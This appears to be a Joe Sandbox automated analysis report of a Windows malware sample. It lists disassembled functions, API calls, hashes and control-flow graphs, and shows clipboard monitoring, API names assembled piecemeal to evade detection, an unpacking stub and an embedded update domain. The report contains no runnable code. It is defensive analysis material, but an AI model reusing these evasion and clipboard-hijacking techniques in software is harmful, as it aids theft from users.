                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMessageSend$ErrorLast$vsprintf
                                                                              • String ID: Failed to set recv timeout: %d$Failed to set send timeout: %d
                                                                              • API String ID: 1785133882-613817813
                                                                              • Opcode ID: df24736c2f179e7d8c39b548996d3c6138925a72012af695bbfac452e9980746
                                                                              • Instruction ID: 48710dd16d4bb94a049b73eb6fa8fca473088dd0fc3453f31d3ff223bccfa4ba
                                                                              • Opcode Fuzzy Hash: df24736c2f179e7d8c39b548996d3c6138925a72012af695bbfac452e9980746
                                                                              • Instruction Fuzzy Hash: CB01F97150021A6FD510DF59DC41CEA739CDF46718F11027EF220971E1EB71A9598FA9
                                                                              Function 00405510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _utime.MSVCRT(?,00000000,00000000,00403D32,0048C3A0), ref: 00405530
                                                                              • fprintf.MSVCRT ref: 0040556D
                                                                              • perror.MSVCRT ref: 00405597
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _utimefprintfperror
                                                                              • String ID: %s:
                                                                              • API String ID: 1785166771-4275611816
                                                                              • Opcode ID: 3dffbf9a68d3ee0bdd35a421d8a46b7207aea4aafc6ba0da58cf8cc004e941c6
                                                                              • Instruction ID: ea4df089108c67531c2501276bd1f0e5eac6c791ba18e3daf09e2411086532cf
                                                                              • Opcode Fuzzy Hash: 3dffbf9a68d3ee0bdd35a421d8a46b7207aea4aafc6ba0da58cf8cc004e941c6
                                                                              • Instruction Fuzzy Hash: D8012970600702ABD720DF18ED45BA773B4EB40705F448439E845D7390E7BDE959CB99
                                                                              Function 00406C50 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_close_ftol_write
                                                                              • String ID:
                                                                              • API String ID: 515767290-0
                                                                              • Opcode ID: 1e22685f529d0e7e0f498c5d4134ad1dc253feffa721d5318dcbabaf7be76eaa
                                                                              • Instruction ID: df442fd90053c9feeb8973ff9425410d7523c43b991ffb05536b29dcd7fee3f0
                                                                              • Opcode Fuzzy Hash: 1e22685f529d0e7e0f498c5d4134ad1dc253feffa721d5318dcbabaf7be76eaa
                                                                              • Instruction Fuzzy Hash: 19118E75700210ABD320AF55FC45B5637A4FB04305F418039FA46A73A1D7B8A9558BAC
                                                                              Function 0040C4C0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,000181A8,UDP), ref: 0040C4D0
                                                                              • ReadProcessMemory.KERNEL32(00000000,?,?,00000008,00000000), ref: 0040C4F1
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C513
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C520
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$MemoryOpenRead
                                                                              • String ID:
                                                                              • API String ID: 2886301649-0
                                                                              • Opcode ID: f07ca3a22f22ee74bf80f5d008dc3cb3148206d23c40f4801dcdd4a502376711
                                                                              • Instruction ID: 9b77d95aa07a515aafef98cd2959181ede7ad831c2098fdcafe781cd687b3d2c
                                                                              • Opcode Fuzzy Hash: f07ca3a22f22ee74bf80f5d008dc3cb3148206d23c40f4801dcdd4a502376711
                                                                              • Instruction Fuzzy Hash: 59F0C875200200BBD6105760BC89BA77B98EBC8711F448535FA08A2280DA78E94D8675
                                                                              Function 0040C480 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,0040A63F), ref: 0040C48D
                                                                              • TerminateProcess.KERNEL32(00000000,00000001), ref: 0040C49C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C4A7
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C4B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$OpenTerminate
                                                                              • String ID:
                                                                              • API String ID: 6823918-0
                                                                              • Opcode ID: adbe3a70cd479fd160a8758a7ab821488207f302df0582f5471ad08ba1937f22
                                                                              • Instruction ID: fe9bee4c77143a5907466da9cd61d09ae68add0d05a8fb7e1787bb6e4ec35e20
                                                                              • Opcode Fuzzy Hash: adbe3a70cd479fd160a8758a7ab821488207f302df0582f5471ad08ba1937f22
                                                                              • Instruction Fuzzy Hash: B0E01231245630BBE7715774BC58BFB3E95EF4DB21F018531FA09E5290D6A88CC146E9
                                                                              Function 00403EF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004040A0: _errno.MSVCRT ref: 004040A0
                                                                                • Part of subcall function 004040A0: _stat.MSVCRT(?,00403286,?,00403286,?), ref: 004040B6
                                                                              • _errno.MSVCRT ref: 00403F45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _errno$_stat
                                                                              • String ID: .gz
                                                                              • API String ID: 2806855196-1476319162
                                                                              • Opcode ID: ecdebaae56c448657769463c8354faebb34d3ac66b5fef828e7804dda314e11d
                                                                              • Instruction ID: abcf562b4a07bd5709b38f6f1b79adf5fd44be04777b779aec6854eb6ee7e443
                                                                              • Opcode Fuzzy Hash: ecdebaae56c448657769463c8354faebb34d3ac66b5fef828e7804dda314e11d
                                                                              • Instruction Fuzzy Hash: CE412775F004080B972899796C5223F7AC6EAD1372768477BFA26D33D1EFBD8D089258
                                                                              Function 0040A140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 0040A147
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: strspn
                                                                              • String ID: usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 579998580-4278508022
                                                                              • Opcode ID: b92f3e12a95c8df390c4e7b3e1c0ecdf86a73b54a571ced51fc7e6a807ff04f6
                                                                              • Instruction ID: 8ed6218633217744d47b0676211f7d420f785628182eeeb3e957c51005231c34
                                                                              • Opcode Fuzzy Hash: b92f3e12a95c8df390c4e7b3e1c0ecdf86a73b54a571ced51fc7e6a807ff04f6
                                                                              • Instruction Fuzzy Hash: 3911733044839657D7314A185C447A67B969B67350F281177D8C16A3C1D2BD0CE7C36B
                                                                              Function 00406D20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 00406D22
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _close_open_read
                                                                              • String ID: usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 2332195497-4278508022
                                                                              • Opcode ID: 292459304e3fa093ca3aa6c1d67f1a4a6ef39fe01e6fb3c2668b0d4aab081832
                                                                              • Instruction ID: ce6ffaf2bdc22260e75823daba1e9e9d0436b6902d524301ff992b185188462e
                                                                              • Opcode Fuzzy Hash: 292459304e3fa093ca3aa6c1d67f1a4a6ef39fe01e6fb3c2668b0d4aab081832
                                                                              • Instruction Fuzzy Hash: B3F0E2B26053117BD300CF54DC05B8BF7A4EFC0321F10892EFA8597280D3B4A4548BE5
                                                                              Function 00406D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 00406D81
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _close_open_write
                                                                              • String ID: usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 27574483-4278508022
                                                                              • Opcode ID: 98045b90ec047b1cf61a4802673313ec3f9d33eb0b86f44a5895cf4be50176fb
                                                                              • Instruction ID: 66d0e943d9c9f463a7499a02f6e9c2c058517d994728e9d9b01985fd350f80a2
                                                                              • Opcode Fuzzy Hash: 98045b90ec047b1cf61a4802673313ec3f9d33eb0b86f44a5895cf4be50176fb
                                                                              • Instruction Fuzzy Hash: 26E0C232A4222077D1111756AC0AFCF776C9FC5B34F068425FA04AB2C0E6B895528BED
                                                                              Function 0040F100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintfperror
                                                                              • String ID: %s:
                                                                              • API String ID: 3398761555-1393465352
                                                                              • Opcode ID: 1d5daf404718f55ed11a8f94899e9655f9d77450507e37f15cae555f1e1e1f32
                                                                              • Instruction ID: 6b025a9c0acd3b36a619481dfd0bd0d634da41c8cccd08e7feef28c59c463175
                                                                              • Opcode Fuzzy Hash: 1d5daf404718f55ed11a8f94899e9655f9d77450507e37f15cae555f1e1e1f32
                                                                              • Instruction Fuzzy Hash: 29C01270680300BBE3045B94DC8DAA63714E7057143908425F406552D0C6FE94C58B2E

                                                                              Execution Graph

                                                                              Execution Coverage:11.1%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:30.1%
                                                                              Total number of Nodes:73
                                                                              Total number of Limit Nodes:3
                                                                              execution_graph 652 40a580 653 40a598 652->653 654 40a692 LoadLibraryA 653->654 655 40a6ce VirtualProtect VirtualProtect 653->655 656 40a6a9 654->656 657 40a702 655->657 656->653 658 40a6b0 GetProcAddress 656->658 657->657 658->656 659 40a6c8 ExitProcess 658->659 723 401d63 IsProcessorFeaturePresent 724 401d89 723->724 660 40117a SetErrorMode CreateThread 661 40119f Sleep 660->661 662 4019fc GetTickCount 660->662 661->661 677 401b58 662->677 664 401a13 665 401a2b GetTickCount 664->665 666 401a38 Sleep 665->666 667 401a4e CreateThread Sleep 665->667 666->665 668 401a4c 666->668 669 401a6e RtlExitUserThread 667->669 682 4015de 667->682 668->669 680 401be0 669->680 672 401b50 RtlExitUserThread 673 401abb 8 API calls 673->672 674 401b22 GetLastError 673->674 674->672 676 401b3b ReleaseMutex CloseHandle ExitProcess 674->676 678 401b61 GetTickCount 677->678 679 401b6c InterlockedExchange 677->679 678->679 679->664 681 401a94 lstrcpy LoadLibraryA 680->681 681->672 681->673 688 4015eb _memset 682->688 683 401647 Sleep 700 401000 OpenClipboard 683->700 686 40199c lstrcpynW 689 40147d 6 API calls 686->689 687 401888 lstrcpynW 690 40147d 6 API calls 687->690 688->683 688->686 688->687 691 4017a0 lstrcpynW 688->691 692 401934 lstrcpynW 688->692 695 4017c6 lstrlenW 688->695 698 40163d 688->698 689->688 690->688 706 40147d 691->706 694 40147d 6 API calls 692->694 694->688 695->698 696 40105e 10 API calls 696->698 697 4011f6 GetTickCount InterlockedExchange 697->698 698->683 698->688 698->696 698->697 705 4011d3 CreateThread 698->705 720 401110 lstrlenW 698->720 701 401011 GetClipboardData GlobalLock lstrlenW 700->701 702 401059 700->702 703 401037 lstrcpyW lstrlenW 701->703 704 40104a GlobalUnlock CloseClipboard 701->704 702->688 703->704 704->702 705->698 707 401490 706->707 712 401488 706->712 708 4014ca 707->708 710 4014b1 lstrcmpiW 707->710 709 4014fa 708->709 713 4014e1 lstrcmpiW 708->713 711 40152a 709->711 716 401511 lstrcmpiW 709->716 710->707 710->712 714 401556 711->714 717 401541 lstrcmpiW 711->717 712->688 713->708 713->712 715 401582 714->715 718 40156d lstrcmpiW 714->718 715->712 719 401599 lstrcmpiW 715->719 716->709 716->712 717->711 717->712 718->712 718->714 719->712 719->715 721 401124 10 API calls 720->721 722 401177 720->722 721->722 722->698 733 40a37d 735 40a3bb 733->735 734 40a51f 735->734 736 40a692 LoadLibraryA 735->736 737 40a6ce VirtualProtect VirtualProtect 735->737 739 40a6b0 GetProcAddress 735->739 736->735 738 40a702 737->738 738->738 739->735 740 40a6c8 ExitProcess 739->740

                                                                              Callgraph

                                                                              Executed Functions

                                                                              Function 004019FC Relevance: 45.6, APIs: 22, Strings: 4, Instructions: 116stringthreadsleepCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00401A06
                                                                                • Part of subcall function 00401B58: GetTickCount.KERNEL32 ref: 00401B61
                                                                                • Part of subcall function 00401B58: InterlockedExchange.KERNEL32(00406120,?), ref: 00401B79
                                                                              • GetTickCount.KERNEL32 ref: 00401A2B
                                                                              • Sleep.KERNELBASE(00000064), ref: 00401A3D
                                                                              • CreateThread.KERNELBASE(00000000,00000000,004015DE,00000000,00000000,00000000), ref: 00401A5D
                                                                              • Sleep.KERNEL32(000003E8), ref: 00401A68
                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00401A70
                                                                              • _memset.LIBCMT ref: 00401A8F
                                                                              • lstrcpy.KERNEL32(?,Cre), ref: 00401AA0
                                                                              • LoadLibraryA.KERNEL32(KERNEL32.DLL,?,?,00000000), ref: 00401AAB
                                                                              • lstrcat.KERNEL32(?,ate), ref: 00401ACA
                                                                              • lstrcat.KERNEL32(?,00403120), ref: 00401AD5
                                                                              • lstrcat.KERNEL32(?,00403124), ref: 00401AE0
                                                                              • lstrcat.KERNEL32(?,00403128), ref: 00401AEB
                                                                              • lstrcat.KERNEL32(?,0040312C), ref: 00401AF6
                                                                              • lstrcat.KERNEL32(?,00403130), ref: 00401B01
                                                                              • lstrcat.KERNEL32(?,00403134), ref: 00401B0C
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401B13
                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 00401B2E
                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00401B3C
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00401B43
                                                                              • ExitProcess.KERNEL32 ref: 00401B4A
                                                                              • RtlExitUserThread.NTDLL(00000000,?,?,00000000), ref: 00401B51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$CountExitThreadTick$SleepUser$AddressCloseCreateErrorExchangeHandleInterlockedLastLibraryLoadMutexProcProcessRelease_memsetlstrcpy
                                                                              • String ID: Cre$KERNEL32.DLL$ate$pdoeamh7sl
                                                                              • API String ID: 1273982165-1558251990
                                                                              • Opcode ID: df6ac5da43656a63cc4e9ab4834b07a7a1ef47e98ee411e1943345bbc4a878df
                                                                              • Instruction ID: 3214588b2f2ff3c8a640620a98d5314ca1e7cca48ddb130ef5ea0ce9fa1aef6b
                                                                              • Opcode Fuzzy Hash: df6ac5da43656a63cc4e9ab4834b07a7a1ef47e98ee411e1943345bbc4a878df
                                                                              • Instruction Fuzzy Hash: 1F310C71941318ABDB10EBE59E8DBAE7E7CAB08745F200436F605F61D1DBB89604CB68
                                                                              Function 004015DE Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 347stringsleepCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 15 4015de-401633 call 401c70 call 401be0 * 2 22 401634-401637 15->22 23 401647-401662 Sleep call 401000 22->23 24 401639-40163b 22->24 28 401667-401670 23->28 24->23 25 40163d-401644 call 4011d3 24->25 25->23 28->22 30 401672-401683 28->30 31 401837-40183e 30->31 32 401689-401690 30->32 31->22 33 401834 32->33 34 401696-4016a8 32->34 33->31 34->33 35 4016ae-4016b4 34->35 35->33 36 4016ba-4016bd 35->36 37 401710-401719 36->37 38 4016bf-4016c5 36->38 37->33 40 40171f-401722 37->40 38->37 39 4016c7-4016cd 38->39 41 4016e7-4016ed 39->41 42 4016cf-4016d6 39->42 43 401728-40172e 40->43 44 40196b-401978 call 401428 40->44 49 4016f8-4016fe 41->49 50 4016ef-4016f6 41->50 47 401700-401702 42->47 48 4016d8-4016dc 42->48 43->44 45 401734-40173a 43->45 59 40181d 44->59 60 40197e-40198e call 401428 44->60 51 401740-401747 45->51 52 401843-40184a 45->52 47->37 55 401704-40170e 47->55 48->47 54 4016de-4016e5 48->54 49->37 49->47 50->37 50->49 51->52 56 40174d-401751 51->56 57 401850-401856 52->57 58 4018dc-4018e2 52->58 54->37 54->41 55->36 55->37 56->52 61 401757-40175e 56->61 57->58 62 40185c-401864 57->62 63 4019f4-4019f7 58->63 64 4018e8-4018fa 58->64 66 401820 59->66 75 401990-401996 60->75 61->52 68 401764-401768 61->68 69 401877-40187a 62->69 67 401826-40182e 63->67 64->59 70 401900-401903 64->70 72 401823 66->72 67->32 67->33 73 401769-40176f 68->73 76 401866-40186f call 401450 69->76 77 40187c-401886 69->77 74 401905-40190e call 4015ba 70->74 78 401825 72->78 79 401771-401774 73->79 80 401776-401779 73->80 93 401910-40191a 74->93 94 40191c-401926 74->94 75->59 83 40199c-4019c5 lstrcpynW call 40147d 75->83 76->77 92 401871-401874 76->92 77->59 84 401888-4018a7 lstrcpynW call 40147d 77->84 78->67 79->80 85 401780-401783 79->85 87 401785-401791 80->87 88 40177b-40177e 80->88 99 4019c7-4019d3 83->99 100 4019e9-4019ef 83->100 84->59 102 4018ad-4018af 84->102 85->73 87->72 96 401797-40179a 87->96 88->85 88->87 92->69 93->94 98 401928-40192e 93->98 94->74 94->98 96->72 101 4017a0-4017c4 lstrcpynW call 40147d 96->101 98->59 105 401934-401959 lstrcpynW call 40147d 98->105 103 4019d5 99->103 104 4019df 99->104 100->78 101->59 113 4017c6-4017de lstrlenW 101->113 107 4018b4-4018d7 call 4011f6 call 40105e 102->107 103->104 104->100 105->59 114 40195f-401966 105->114 121 40180c-40180e 107->121 115 4017e0-4017e5 113->115 116 4017e7 113->116 114->107 118 4017ec-401809 call 4011f6 call 40105e 115->118 116->118 118->121 121->66 123 401810-40181c call 401110 121->123 123->59
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcpyn$_memset$Sleeplstrlen
                                                                              • String ID: @*@$p'@
                                                                              • API String ID: 1046678486-4028331986
                                                                              • Opcode ID: 64be5407139f6250325cb768188bad153ff99ea62a955ba5200bf067d1ec9d9a
                                                                              • Instruction ID: b2184139ed62e37314ec35da6dbcdaee06718655f8cbb7b4e9e68ae4e227d81f
                                                                              • Opcode Fuzzy Hash: 64be5407139f6250325cb768188bad153ff99ea62a955ba5200bf067d1ec9d9a
                                                                              • Instruction Fuzzy Hash: 6AB12977E8021556DB30AAA58C45AEB73B8AB24710F50C477FA41F72E0E6789FC2C758
                                                                              Function 0040A580 Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 128 40a580-40a590 129 40a5a2-40a5a7 128->129 130 40a5a9 129->130 131 40a598-40a59d 130->131 132 40a5ab 130->132 134 40a59e-40a5a0 131->134 133 40a5b0-40a5b2 132->133 135 40a5b4-40a5b9 133->135 136 40a5bb-40a5bf 133->136 134->129 134->130 135->136 136->133 137 40a5c1 136->137 138 40a5c3-40a5ca 137->138 139 40a5cc-40a5d1 137->139 138->133 138->139 140 40a5e0-40a5e2 139->140 141 40a5d3-40a5dc 139->141 144 40a5e4-40a5e9 140->144 145 40a5eb-40a5ef 140->145 142 40a652-40a655 141->142 143 40a5de 141->143 146 40a65a-40a65d 142->146 143->140 144->145 147 40a5f1-40a5f6 145->147 148 40a5f8-40a5fa 145->148 149 40a65f-40a661 146->149 147->148 150 40a61c-40a62b 148->150 151 40a5fc 148->151 149->146 153 40a663-40a666 149->153 154 40a63c-40a649 150->154 155 40a62d-40a634 150->155 152 40a5fd-40a5ff 151->152 156 40a601-40a606 152->156 157 40a608-40a60c 152->157 153->146 158 40a668-40a684 153->158 154->154 160 40a64b-40a64d 154->160 155->155 159 40a636 155->159 156->157 157->152 161 40a60e 157->161 158->149 162 40a686 158->162 159->134 160->134 163 40a610-40a617 161->163 164 40a619 161->164 165 40a68c-40a690 162->165 163->152 163->164 164->150 166 40a692-40a6a8 LoadLibraryA 165->166 167 40a6ce-40a6fe VirtualProtect * 2 165->167 168 40a6a9-40a6ae 166->168 169 40a702-40a706 167->169 168->165 170 40a6b0-40a6bf GetProcAddress 168->170 169->169 171 40a708 169->171 172 40a6c1-40a6c6 170->172 173 40a6c8 ExitProcess 170->173 172->168
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3537251616.000000000040A000.00000080.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000007.00000002.3536949538.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000401000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537037918.0000000000409000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3537356678.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_400000_3.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: acfc02b7a708e3d4813c213db68354be632adf27f904e3e80da1141b5a5011a0
                                                                              • Instruction ID: b84357d2e3d7aa390a3482ba8b1ba812a54a2504d87ea14439c6ef2134fbe255
                                                                              • Opcode Fuzzy Hash: acfc02b7a708e3d4813c213db68354be632adf27f904e3e80da1141b5a5011a0
                                                                              • Instruction Fuzzy Hash: BD512B716503125BD7209DB88C846A57BA0FB52334F1C0B3AD5E2E73C5E7BC5C1A875A
